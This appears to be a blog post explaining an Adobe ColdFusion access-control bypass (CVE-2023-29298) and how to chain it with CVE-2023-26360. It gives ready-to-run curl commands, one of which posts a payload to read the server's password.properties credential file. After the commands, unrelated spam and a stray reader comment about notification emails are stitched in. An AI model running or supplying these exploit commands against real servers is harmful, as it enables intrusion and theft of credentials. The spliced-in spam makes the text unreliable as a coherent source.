Adobe ColdFusion Access Control Bypass
As the attacker-controlled URL path is tested with a call to
java.lang.String.startsWith
, this access check can be bypassed by inserting an additional character at the start of the URL path, which will cause the
startsWith
check to fail but will still allow the underlying servlet to be able to resolve the requested resource. The character in question is an additional forward slash.
⚠️The access control bypass in CVE-2023-29298 can also be leveraged to assist in the exploitation of an existing ColdFusion vulnerability(for example – CVE-2023-26360, which allows for both arbitrary file reading as well as RCE). We can chain CVE-2023-29298 to CVE-2023-26360 and bypass the access control in order to reach a CFC endpoint and trigger the vulnerability
💾Trigger vulnerability(CVE-2023-29298) using the cURL command:
c:\> curl -v -k http://172.23.10.174:8500//CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo
💾Chain CVE-2023-29298 to CVE-2023-26360 and bypass the access control in order to reach a CFC endpoint and trigger the vulnerability:
c:> curl -v -k http://172.26.181.162:8500//CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo^&_cfclient=true^&returnFormat=wddx -X POST -H "Content-Type: application/x-www-form-urlencoded" --data "_variables={\"about\":{\"_metadata\":{\"classname\":\"\\..\\lib\\password.properties\"},\"_variables\":{}}}"
canada pharmacy online
After I initially commented I appear to have clicked the -Notify me when new comments are added- checkbox and now whenever a comment is added I recieve four emails with the exact same comment. Is there an easy method you can remove me from that service? Thanks!